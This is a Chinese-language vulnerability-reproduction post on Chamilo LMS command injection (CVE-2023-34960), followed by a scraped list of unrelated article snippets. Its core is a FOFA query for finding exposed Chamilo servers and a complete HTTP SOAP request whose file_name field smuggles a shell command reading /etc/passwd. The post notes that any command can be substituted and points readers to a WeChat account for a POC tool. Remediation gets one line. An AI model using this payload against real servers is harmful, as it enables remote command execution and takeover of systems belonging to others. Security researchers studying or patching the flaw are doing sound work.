​Chamilo 学习管理软件存在命令执行漏洞(CVE-2023-34960)

news/2024/2/28 1:56:08

Chamilo 学习管理软件存在命令执行漏洞(CVE-2023-34960)

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. Chamilo 学习管理软件简介

微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发

Chamilo是一款可供用户免费下载的学习管理软件,其目的是提高来自弱势背景的用户对在线课程的可及性。Chamilo由一个名为Chamilo协会的非营利组织运行和管理。

2.漏洞描述

Chamilo是一款可供用户免费下载的学习管理软件,其目的是提高来自弱势背景的用户对在线课程的可及性。Chamilo由一个名为Chamilo协会的非营利组织运行和管理。Chamilo存在命令执行漏洞,恶意攻击者可以通过构造的xml文件任意命令,进而控制服务器。

CVE编号:CVE-2023-34960

CNNVD编号: 

CNVD编号:

3.影响版本

Chamilo

4.fofa查询语句

app="Chamilo"

5.漏洞复现

漏洞链接:https://www.xxx.com/main/webservices/additional_webservices.php 漏洞数据包:

POST /main/webservices/additional_webservices.php HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Content-Length: 826
Content-Type: application/x-www-form-urlencoded<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{http://ip:port}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">`{}`.pptx'|" |cat /etc/passwd||a #</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>

执行cat /etc/passwd 命令,也可以把该命令换成别的执命令 

6.POC&EXP

关注公众号  南风漏洞复现文库 并回复  漏洞复现37  即可获得该POC工具下载地址:

 

7.整改意见

升级到最新版本或打补丁

8.往期回顾

海康威视iVMS综合安防系统任意文件上传漏洞复现

华夏ERP存在泄露用户名和密码敏感漏洞(CNVD-2020-63964)


http://www.ppmy.cn/news/640602.html

相关文章

CognosBI技术建议书

XXXXXBI系统&#xff08;一期&#xff09; 技术方案建议书 二〇一二年九月十九日 目 录 Cognos产品方案建议书 - 1 - 第一章 引言 - 5 - 1&#xff0e;1《XXXXXBI系统》建设思路 - 5 - 1&#xff0e;2《XXXXXBI系统》 Cognos产品技术方案内容简介 - 5 - 第二章《XXXXXBI系统》初…

osgEarth资源链接

1&#xff09;The OpenSceneGraph Project Website开源三维引擎 http://www.openscenegraph.org/ 英文 http://www.osgchina.org/ 中文 OpenSceneGraph是一个开源的三维引擎&#xff0c;被广泛的应用在可视化仿真、游戏、虚拟现实、科学计算、三维重建、地理信息、太空探索、…

过去66年的66项最佳发明(1994~2019)

1994&#xff1a;RQ-1铁血战士无人机 RQ-1“捕食者”无人机的想法是在1980年代提出的&#xff0c;但直到1994年才在莫哈韦沙漠中进行首次飞行测试。从那时起&#xff0c;无人驾驶飞机已越来越多地融入美国军队&#xff0c;并永远改变了人类打仗的方式。在2002年&#xff0c;该无…

计算机网络第5版答案完整版

1 《计算机网络》课后习题答案 第一章概述 1-1 计算机网络向用户可以提供哪些服务&#xff1f; 答&#xff1a;计算机网络向用户提供的最重要的功能有两个&#xff0c;连通性和共享。 1-2 试简述分组交换的特点 答&#xff1a;分组交换实质上是在“存储——转发”基础上发展…

第三天---网络系统硬件

网络硬件&#xff1a; 网络硬件设备主要厂商有 华为、h3c、思科、juniper、中兴、锐捷、深信服 网络设备包括&#xff1a;路由器、交换机、ac、ap、防火墙等 网络硬件设备 路由器&#xff1a; 路由器在TCP/IP协议栈中负责网络层的数据交换与传输。路由器还具备判断网络地址及选…

KiCAD源码解析(2):根目录CmakeList解析

KiCAD源码解析&#xff08;2&#xff09;&#xff1a;根目录CmakeList解析 Kicad根目录CmakeList解析 提示&#xff1a;想学习cmake的看此篇文章也用处多多 根目录CMakeLists.txt解析 KiCAD源码解析&#xff08;2&#xff09;&#xff1a;根目录CmakeList解析1、总体结构2、详…

校园网建设方案模板

前言 0.1建设学校校园网的必要性 由于计算机网络技术和通信技术的飞速发展&#xff0c;人们对信息的要求越来越强烈&#xff0c;“网络就是计算机”的说法被全世界普遍接受。各级政府教育与局开始引起重视&#xff0c;中小学校园网的建设已经逐渐提到议事日程上来。当前由于网络…

最近大火的「元宇宙」是什么?

作者&#xff1a;腾讯技术工程特约撰稿人 李佳华 本文将介绍元宇宙的由来和底层技术&#xff0c;探讨海内外资本在这条赛道上的布局&#xff0c;元宇宙将会对哪些行业产生变革的影响&#xff0c;这些影响背后凸显了元宇宙的哪些价值&#xff0c;以及元宇宙逐步实现的过程中监管…

计算机三级周跃视频笔记

文章目录 计算机三级周跃第一章 网络系统结构与设计基本原则考点1.1 基础知识1.1.1 计算机网络分类1.1.2 计算机网络结构特点(不考&#xff0c;了解)1.1.3 广域网发展(不考&#xff0c;了解)1.1.4 局域网技术发展(不考&#xff0c;了解)1.1.5 城域网技术发展(不考&#xff0c;了…

元宇宙:不透明面纱下的“康德主义”

大卫查默斯是意识领域的领先思想家。他的学术生涯始于数学&#xff0c;但慢慢转向认知科学和心灵哲学。他最终在道格拉斯霍夫施塔特&#xff08;Douglas Hofstadter&#xff09;的指导下进入印第安纳大学工作&#xff0c;他的著作《哥德尔、埃舍尔、巴赫&#xff1a;永恒的金辫…

北大推荐书籍

1、《追寻生命的意义》 作者&#xff1a;弗兰克尔 弗兰克尔是20世纪著名的心理学家&#xff0c;纳粹时期&#xff0c;作为犹太人&#xff0c;他的全家都被关进了奥斯威辛集中营&#xff0c;他的父母、妻子、哥哥&#xff0c;全都死于毒气室中&#xff0c;只有他和妹妹幸…

聚焦前沿丨2021世界VR产业大会倒计时,酷雷曼与众齐聚英雄城

重磅来袭&#xff0c;2021世界VR产业大会将于10月17日在南昌绿地国际博览中心举办。 作为全球VR产业领域极具影响力的行业盛会&#xff0c;世界VR产业大会已经带领整个VR行业连续走过了3年&#xff0c;共同见证了VR产业的快速发展。 VR产业大会 据悉&#xff0c;本届大会采取…

OSG例子程序简介

1.example_osganimate 一&#xff09;演示了路径动画的使用&#xff08;AnimationPath、AnimationPathCallback&#xff09;&#xff0c;路径动画回调可以作用在Camera、CameraView、MatrixTransform、PositionAttitudeTransform等四种类型的节点上。 二&#xff09;演示了osgS…

让阿里再次伟大--钉钉如何长成独角兽的?

文章目录 引子开端发展历程&#xff1a;从2014到2022钉钉和阿里云的全面融合钉钉体系架构技术挑战ToB与ToC的差异安全要求高稳定性要求高业务多样性 钉钉的创新存储创新单元化平台开放 这些年&#xff0c;钉钉做了哪些优化?钉钉的技术栈钉钉的竞争对手们飞书微信华为welink 未…

如何系统学习领域驱动设计(DDD)?

作者简介 张逸&#xff0c;曾先后就职于中兴通讯、惠普 GDCC、中软国际、ThoughtWorks 等大型中外企业&#xff0c;任职角色为高级软件工程师、架构师、技术总监、首席咨询师。 精通包括 Java、Scala、Python、C#、JavaScript、Ruby 等多种语言&#xff0c;熟练掌握面向对象思…

领域驱动设计,为何又死灰复燃了?

作者简介 张逸&#xff0c;曾先后就职于中兴通讯、惠普 GDCC、中软国际、ThoughtWorks 等大型中外企业&#xff0c;任职角色为高级软件工程师、架构师、技术总监、首席咨询师。 一、领域驱动设计为何又死灰复燃焕发青春&#xff1f; 领域驱动设计&#xff08;Domain Driven De…

MBOBOSS

OSS&#xff08;运营支撑系统&#xff09; OSS是一个综合的业务运营和管理平台&#xff0c;同时也是真正融合了传统IP数据业务与移动增值业务的综合管理平台。OSS是电信运营商的一体化、信息资源共享的支持系统&#xff0c;它主要由网络管理、系统管理、计费、营业、账务和客户…

是德科技 不懈追求行业创新的奋斗史(百年企业,赞!)

引言 自行业先驱者比尔‧休利特&#xff08;Bill Hewlett&#xff09;和戴维‧帕卡德&#xff08;Dave Packard&#xff09;创立惠普公司以来&#xff0c;是德科技如今提供的一系列产品在业界创造过无数个行业第一&#xff0c;这些产品帮助我们的客户不断创新&#xff0c;打造…

Linux Shell文件处理

预计更新 1: 基础知识 简介和安装 基本命令 变量和环境变量 2: 流程控制 条件语句 循环语句 函数 3: 文件处理 文件读写 文件权限和所有权 文件搜索和替换 4: 网络和进程 网络通信 进程管理 信号处理 5: 文本处理 正则表达式 文本分析和处理 生成报告和日志 6: 用户界面 命…

Filter过滤器

概述 过滤器实际上就是对web资源进行拦截&#xff0c;做一些处理后再交给下一个过滤器或servlet处理 通常都是用来拦截request进行处理的&#xff0c;也可以对返回的response进行拦截处理。 通常用来做一些通用配置&#xff0c;比如&#xff1a;权限验证&#xff0c;登录验证…
最新文章